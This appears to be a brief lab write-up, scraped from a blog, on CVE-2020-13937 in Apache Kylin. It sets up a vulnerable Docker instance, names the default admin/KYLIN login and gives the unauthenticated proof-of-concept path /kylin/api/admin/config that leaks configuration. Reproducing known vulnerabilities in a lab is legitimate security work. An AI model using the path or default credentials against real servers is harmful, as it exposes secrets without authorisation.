Apache Kylin config Unauthorized configuration leak CVE-2020-13937
Apache Kylin config Unauthorized configuration leak CVE-2020-13937
Apache Kylin config Unauthorized configuration leak CVE-2020-13937
Vulnerability Description
Apache Kylin has a restful API that exposes configuration information without any authentication
Network surveying and mapping
Environment construction
</a-alert>
1
2
3
4
5
6
7
8
9
10
11
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
After opening, log in with the default account password admin/KYLIN. The initial interface appears. Success
##
Vulnerability reappears
Vulnerability Verification POC
1
/kylin/api/admin/config
This post is licensed under CC BY 4.0 by the author.